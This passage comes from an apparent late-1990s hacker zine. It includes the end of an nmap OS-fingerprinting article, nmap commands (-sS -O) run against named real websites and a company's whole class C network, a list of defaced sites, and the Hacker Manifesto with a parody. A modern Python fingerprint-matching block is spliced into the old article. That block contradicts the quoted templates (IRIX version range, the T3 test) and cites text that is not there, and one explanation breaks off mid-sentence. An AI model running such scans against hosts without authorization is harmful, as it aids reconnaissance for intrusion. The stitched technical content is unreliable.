T4(DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

Let's look at the first line (I'm adding '>' quote markers):

> FingerPrint IRIX 6.2 - 6.3 # Thanks to Lamont Granquist

This simply says that the fingerprint covers IRIX versions 6.2 through 6.3 and the comment states that Lamont Granquist kindly sent me the IP addresses or fingerprints of the IRIX boxes tested.

> TSeq(Class=i800)

This means that ISN sampling put it in the "i800 class". This means that each new sequence number is a multiple of 800 greater than the last one.

> T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT)

The test is named T1 (for test1, clever eh?). In this test we send a SYN packet with a bunch of TCP options to an open port. DF=N means that the "Don't fragment" bit of the response must not be set. W=C000|EF2A means that the window advertisement we received must be 0xC000 or EF2A.
ACK=S++ means the acknowledgement we receive must be our initial sequence number plus 1. Flags = AS means the ACK and SYN flags were sent in the response. Ops = MNWNNT means the options in the response must be (in this order):

> T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)

Test 2 involves a NULL with the same options to an open port. Resp=Y means we must get a response. Ops= means that there must not be any options included in the response packet. If we took out '%Ops=' entirely then any options sent would match.

> T3(Resp=Y%DF=N%W=400%ACK=S++%Flags=AS%Ops=M)

Test 3 is a SYN|FIN|URG|PSH w/options to an open port.

> T4(DF=N%W=0%ACK=O%Flags=R%Ops=)

This is an ACK to an open port. Note that we do not have a Resp= here. This means that lack of a response (such as the packet being dropped on the network or an evil firewall) will not disqualify a match as long as all the other tests match. We do this because virtually any OS will send a response, so a lack of response is generally an attribute of the network conditions and not the OS itself. We put the Resp tag in tests 2 and 3 because some operating systems do drop those without responding.

> T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
> T6(DF=N%W=0%ACK=O%Flags=R%Ops=)
> T7(DF=N%W=0%ACK=S%Flags=AR%Ops=)

These tests are a SYN, ACK, and FIN|PSH|URG, respectively, to a closed port. The same options as always are set. Of course this is all probably obvious given the descriptive names 'T5', 'T6', and 'T7' :).

> PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

This big sucker is the 'port unreachable' message test. You should recognize the DF=N by now. TOS=0 means that IP type of service field was 0. The next two fields give the (hex) values of the IP total length field of the message IP header and the total length given in the IP header they are echoing back to us. RID=E means the RID value we got back in the copy of our original UDP packet was expected (ie the same as we sent).
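The template grammar and matching rules described in this section (alternatives with '|', Resp=Y, an empty Ops=, a test without a Resp tag tolerating a dropped reply), as an added example that is not nmap's code: it parses the IRIX template quoted above and checks it against constructed, already-decoded probe replies, so the probe sending and packet decoding are assumed to happen elsewhere.

```python
"""Fingerprint template parser and matcher (added example, not nmap's own code).

Implements the grammar this section walks through: a 'FingerPrint <os> # comment'
header followed by Tn(attr=val%attr=val|alt...) lines, and the matching rules it
states. Replies are plain dicts of decoded attributes; the samples are constructed.
"""
import re

TEST_RE = re.compile(r"^(\w+)\((.*)\)$")


def parse_test(line):
    """'T1(DF=N%W=C000|EF2A%Ops=MNWNNT)' -> ('T1', {'DF': {'N'}, 'W': {'C000', 'EF2A'}, ...}).

    Alternatives separated by '|' become a set. 'Ops=' (empty value) becomes {''},
    meaning the reply must carry no options at all.
    """
    m = TEST_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a test line: {line!r}")
    name, body = m.groups()
    attrs = {}
    for field in filter(None, body.split("%")):
        key, _, value = field.partition("=")
        attrs[key] = {v.upper() for v in value.split("|")}
    return name, attrs


def parse_fingerprint(text):
    """Parse one block: the FingerPrint header (comment stripped) plus its test lines."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    if not lines or not lines[0].startswith("FingerPrint"):
        raise ValueError("block must start with a FingerPrint header")
    os_name = lines[0][len("FingerPrint"):].split("#", 1)[0].strip()
    tests = dict(parse_test(ln) for ln in lines[1:])
    return os_name, tests


def match_test(template, reply):
    """reply is None (nothing came back) or {attr: observed value}."""
    resp = template.get("Resp")
    if reply is None:
        return resp != {"Y"}            # silence only disqualifies when Resp=Y was demanded
    if resp == {"N"}:
        return False                    # template expects no reply but one arrived
    return all(reply.get(key, "").upper() in allowed
               for key, allowed in template.items() if key != "Resp")


def failing_tests(tests, replies):
    """Names of the template tests the replies do not satisfy; empty means a match."""
    return [name for name, tmpl in tests.items() if not match_test(tmpl, replies.get(name))]


def identify(template_text, replies):
    """Return the template's OS name if every test matches, else None."""
    os_name, tests = parse_fingerprint(template_text)
    return os_name if not failing_tests(tests, replies) else None


# The IRIX template quoted in the article.
IRIX_TEMPLATE = """
FingerPrint IRIX 6.2 - 6.4 # Thanks to Lamont Granquist
TSeq(Class=i800)
T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=C000|EF2A%ACK=O%Flags=A%Ops=NNT)
T4(DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
"""

# Constructed decoded replies for a host that behaves like the template.
# T4 is None: the ACK probe was dropped, but T4 has no Resp tag so it still matches.
CLOSED = {"DF": "N", "W": "0", "Ops": ""}
IRIX_LIKE_REPLIES = {
    "TSeq": {"Class": "i800"},
    "T1": {"DF": "N", "W": "EF2A", "ACK": "S++", "Flags": "AS", "Ops": "MNWNNT"},
    "T2": {**CLOSED, "ACK": "S", "Flags": "AR"},
    "T3": {"DF": "N", "W": "C000", "ACK": "O", "Flags": "A", "Ops": "NNT"},
    "T4": None,
    "T5": {**CLOSED, "ACK": "S++", "Flags": "AR"},
    "T6": {**CLOSED, "ACK": "O", "Flags": "R"},
    "T7": {**CLOSED, "ACK": "S", "Flags": "AR"},
    "PU": {"DF": "N", "TOS": "0", "IPLEN": "38", "RIPTL": "148", "RID": "E",
           "RIPCK": "E", "UCK": "E", "ULEN": "134", "DAT": "E"},
}

# Same host except the options come back in the Linux 2.1.122 order the article
# quotes (MENNTNW) and the NULL probe (T2, which demands Resp=Y) gets no reply.
OTHER_REPLIES = {**IRIX_LIKE_REPLIES,
                 "T1": {**IRIX_LIKE_REPLIES["T1"], "Ops": "MENNTNW"},
                 "T2": None}

if __name__ == "__main__":
    print(identify(IRIX_TEMPLATE, IRIX_LIKE_REPLIES))               # IRIX 6.2 - 6.4
    print(failing_tests(parse_fingerprint(IRIX_TEMPLATE)[1], OTHER_REPLIES))  # ['T1', 'T2']
```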
RIPCK=E means they didn't fuck up the checksum (if they did, it would say RIPCK=F). UCK=E means the UDP checksum is also correct. Next comes the UDP length which was 0x134 and DAT=E means they echoed our UDP data correctly. Since most implementations (including this one) do not send any of our UDP data back, they get DAT=E by default.

The version of nmap with this functionality is currently in the 6th private beta cycle. It may be out by the time you read this in Phrack. Then again, it might not. See http://www.insecure.org/nmap/ for the latest version.

POPULAR SITE SNAPSHOTS

Here is the fun result of all our effort. We can now take random Internet sites and determine what OS they are using. A lot of these people have eliminated telnet banners, etc. to keep this information private. But this is of no use with our new fingerprinter! Also this is a good way to expose the users as the lamers that they are :)!

The command used in these examples was: nmap -sS -p 80 -O -v

Also note that most of these scans were done on 10/18/98. Some of these folks may have upgraded/changed servers since then. Note that I do not like every site on here.

# "Hacker" sites or (in a couple cases) sites that think they are
www.l0pht.com => OpenBSD 2.2 - 2.4
www.insecure.org => Linux 2.0.31-34
www.rhino9.ml.org => Windows 95/NT        # No comment :)
www.technotronic.com => Linux 2.0.31-34
www.nmrc.org => FreeBSD 2.2.6 - 3.0
www.cultdeadcow.com => OpenBSD 2.2 - 2.4
www.kevinmitnick.com => Linux 2.0.31-34   # Free Kevin!
www.2600.com => FreeBSD 2.2.6 - 3.0 Beta
www.antionline.com => FreeBSD 2.2.6 - 3.0 Beta
www.rootshell.com => Linux 2.0.35         # Changed to OpenBSD after they got owned.

# Security vendors, consultants, etc.
www.repsec.com => Linux 2.0.35
www.iss.net => Linux 2.0.31-34
www.checkpoint.com => Solaris 2.5 - 2.51
www.infowar.com => Win95/NT

# Vendor loyalty to their OS
www.li.org => Linux 2.0.35                # Linux International
www.redhat.com => Linux 2.0.31-34         # I wonder what distribution :)
www.debian.org => Linux 2.0.35
www.linux.org => Linux 2.1.122 - 2.1.126
www.sgi.com => IRIX 6.2 - 6.4
www.netbsd.org => NetBSD 1.3X
www.openbsd.org => Solaris 2.6            # Ahem :)
www.freebsd.org => FreeBSD 2.2.6-3.0 Beta

# Ivy league
www.harvard.edu => Solaris 2.6
www.yale.edu => Solaris 2.5 - 2.51
www.caltech.edu => SunOS 4.1.2-4.1.4      # Hello! This is the 90's :)
www.stanford.edu => Solaris 2.6
www.mit.edu => Solaris 2.5 - 2.51         # Coincidence that so many good schools seem to like Sun? Perhaps it is the 40% .edu discount :)
www.berkeley.edu => UNIX OSF1 V 4.0,4.0B,4.0D
www.oxford.edu => Linux 2.0.33-34         # Rock on!

# Lamer sites
www.aol.com => IRIX 6.2 - 6.4             # No wonder they are so insecure :)
www.happyhacker.org => OpenBSD 2.2-2.4    # Sick of being owned, Carolyn? Even the most secure OS is useless in the hands of an incompetent admin.

# Misc
www.lwn.net => Linux 2.0.31-34            # This Linux news site rocks!
www.slashdot.org => Linux 2.1.122 - 2.1.126
www.whitehouse.gov => IRIX 5.3
sunsite.unc.edu => Solaris 2.6

Notes: In their security white paper, Microsoft said about their lax security: "this assumption has changed over the years as Windows NT gains popularity largely because of its security features.". Hmm, from where I stand it doesn't look like Windows is very popular among the security community :). I only see 2 Windows boxes from the whole group, and Windows is easy for nmap to distinguish since it is so broken (standards wise).

And of course, there is one more site we must check. This is the web site of the ultra-secret Transmeta corporation. Interestingly the company was funded largely by Paul Allen of Microsoft, but it employs Linus Torvalds.
So do they stick with Paul and run NT or do they side with the rebels and join the Linux revolution? Let us see:

We use the command: nmap -sS -F -o transmeta.log -v -O www.transmeta.com//24

This says SYN scan for known ports (from /etc/services), log the results to 'transmeta.log', be verbose about it, do an OS scan, and scan the class 'C' where www.transmeta.com resides. Here is the gist of the results:

neon-best.transmeta.com (206.184.214.10) => Linux 2.0.33-34
www.transmeta.com (206.184.214.11) => Linux 2.0.30
neosilicon.transmeta.com (206.184.214.14) => Linux 2.0.33-34
ssl.transmeta.com (206.184.214.15) => Linux unknown version
linux.kernel.org (206.184.214.34) => Linux 2.0.35
www.linuxbase.org (206.184.214.35) => Linux 2.0.35 ( possibly the same machine as above )

Well, I think this answers our question pretty clearly :).

ACKNOWLEDGEMENTS

The only reason Nmap is currently able to detect so many different operating systems is that many people on the private beta team went to a lot of effort to search out new and exciting boxes to fingerprint! In particular, Jan Koum, van Hauser, Dmess0r, David O'Brien, James W. Abendschan, Solar Designer, Chris Wilson, Stuart Stock, Mea Culpa, Lamont Granquist, Dr. Who, Jordan Ritter, Brett Eldridge, and Pluvius sent in tons of IP addresses of wacky boxes and/or fingerprints of machines not reachable through the Internet.

Thanks to Richard Stallman for writing GNU Emacs. This article would not be so well word-wrapped if I was using vi or cat and ^D.

Questions and comments can be sent to fyodor@DHP.com (if that doesn't work for some reason, use fyodor@insecure.org). Nmap can be obtained from http://www.insecure.org/nmap .

@HWA

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

END of main news articles content...
read on for ads, humour, hacked websites etc

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

HWA.hax0r.news AD.S
ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*****************************************************************************
* ATTRITION.ORG http://www.attrition.org                                    *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror                        *
* ATTRITION.ORG DoS Database, Crypto Archive                                *
* ATTRITION.ORG Sarcasm, Rudeness, and More.                                *
*****************************************************************************

www.2600.com www.freekevin.com www.kevinmitnick.com
Support 2600.com and the Free Kevin defense fund site, visit it now!
FREE KEVIN!
www.2600.com www.freekevin.com www.kevinmitnick.com

One of our sponsors, visit them now: www.csoft.net

* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*

* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed           //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! .............

An oldie but goodie and translated from that gawdawful 'krad speak' for those of you that have been living under a rock for the last 10 years; the original file follows this spoof. - Ed

This was edited from krad-speak to ascii..
if you want to see it in its original glory, see BoW 4

______________________________________________________________________________
                     Th3 K0nsc|3nc3 0f a K0ur|3r
                        by: Th3 K0d3s1ay3r
==============================================================================
The following wuz written shortly after my arrest...
Written on March 20, 1994
------------------------------------------------------------------------------

Another one kaught today, itz all over the paperz. "Teenager arrested in software piracy skandal", "kourier arrested after distributing warez"...

Damn Kidz. They're all alike.

But did u, in u're 3-piece psychology and 1950's technobrain, ever take a look behind the eyez of a kourier? Did u ever wonder what made him tick, what forcez shaped him, what may have molded him?

I am a kourier, enter my world...

Mine iz a world that beginz with skool... I'm not the smartezt kid in the class, I don't quite get this education thing...

Damn underachiever. They're all alike.

I'm in cosmetology skool or kommunity college. I've listened to teacherz explain for the fifteenth time how to reduce a fraction, and I still don't understand it. "No Ms. Smith, I didn't show my work. I don't get how u type with these pencil things. Give me a joystick or something."

Damn kid. Must be a druggie. They're all alike.

I make a discovery today. I found a computer. Wait a second, this is cool. I can play commander keen all i want. If i loose a game, it's because i didn't get the 0-day eleet game c0dez. Not because it doesn't like me...
Or feelz i'm a worthless inbred skumbag...
Or thinkz i'm an idiot...
Or doesn't like teaching and is threatened by my good looks...
Damn kid. All he duz is play doom. They're all alike.

And then it happened... a door opened to a new world... rushing thru the fone line like heroin thru an addict's veinz, the latest version of DOS is sent out at a bazillion baud, a refuge from intelligence is sought... a 0-day warez board is found!
"This is it... this is where i belong!"
I know everyone here... even if i've never met them, never talked to them, never traded apogee with them, may never hear from them again... i know u all...
Damn kid. Tying up the fone line again. They're all alike...

U bet u're ass we're all alike... we've been spoon-fed baby food at skool when we hungered for ANSI and codez... the bitz of meat u did let slip thru were a little on the well done side and i had a little trouble digesting them. We've been dominated by intellectualz, or ignored by dum skolar dudez. The few that had something to teach talked in some fancee shmancee english language or something, and i wouldn't know what they were talking about anyway.

This is our world now... the world of the kode and the console copier, the beauty of the file point. We make use of some telefone thing or something for free with codez so we don't have to pay to trade -15 day gamez and the latest ANSI releases, and u kall us kriminals. We trace credit cards... and U call us kriminals. We distribute copyrighted software... and u call us criminals. We steal games from radio shack... and u call us criminals. We exist without skin color, (cuz we're always inside downloading and uploading) without religious bias, (cuz we have know idea that the hell religios bias is) without intelligence... and u kall us criminals. U start wars and stuff, yet we're the kriminals.

Yes, I am a criminal. My crime is that of stupidity.
My crime is that of judging people by how much they upload and how k-rad they're typing is, not what they look like or if they can spell they're name right the first time without messing up. My crime is that of stealing u're work and putting my name On it, and u get all huffy puffy about it.

I am a kourier, and this is my manifesto. U may stop one moron, but U can't stop us all! After all, we're all alike.

                                                          +++The Kodeslayer+++

=----------------------------------------------------------------------------------------=

The Hacker Manifesto aka 'The Mentor's Last Words'

                               ==Phrack Inc.==

                    Volume One, Issue 7, Phile 3 of 10

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following was written shortly after my arrest...

                       \/\The Conscience of a Hacker/\/

                                      by

                               +++The Mentor+++

                          Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me...
Or feels threatened by me...
Or thinks I'm a smart ass...
Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found.
"This is it... this is where I belong..."
I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
                                                              +++The Mentor+++
_______________________________________________________________________________
-=-

@HWA

SITE.1

http://www.insecure.org/

SiteOp: Fyodor

Real hacker's site by a real hacker, lots of good resources and reading materials. Fyodor is the author of the infamous nmap program and used to run Fyodor's Exploit World, which inspired the likes of Rootshell.... give it a look see if you haven't already - eentity

@HWA

H.W Hacked websites
    ~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while; for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

From HNN rumours section http://www.hackernews.com/

See the archives section on HNN or attrition.org for copies of many of these sites in their defaced form. http://www.attrition.org/

Latest cracked pages courtesy of attrition.org

(www.reverse.net) .......................... Reverse Net
(www.isop.org) ............................. Internet Society of Pakistan
(matahum.bacolod.worldtelphil.com) ......... World Telphil
(www.aspx.com) ............................. ASPX
(www.greatbasinphoto.com)................... Great Basin Photo
(www.guesslimousines.com)................... Guess Limousines
(www.hotelrivieramaya.com).................. Hotel Riviera Maya
(www.icaroweb.com) ......................... Icaro Web
(www.motoairbag.com)........................ Moto Airbag
(www.webnautics.com) ....................... Webnautics
(www.vanasia.it)............................ Vanasia
(summa.infosquare.it)....................... Infosquare (IT)
(www.infosatpoint.it)....................... Infosat Point (IT)
(www.medicinasportiva.it)................... Medicina Sportiva (IT)
(www.targetgroup.it)........................ Target Group (IT)
(www.presidencia.gov.py).................... Presidencia (PY)

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file; there is now a links section on the http://welcome.to/HWA.hax0r.news/ url, so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/ New jargon file

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list thanks...
- Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]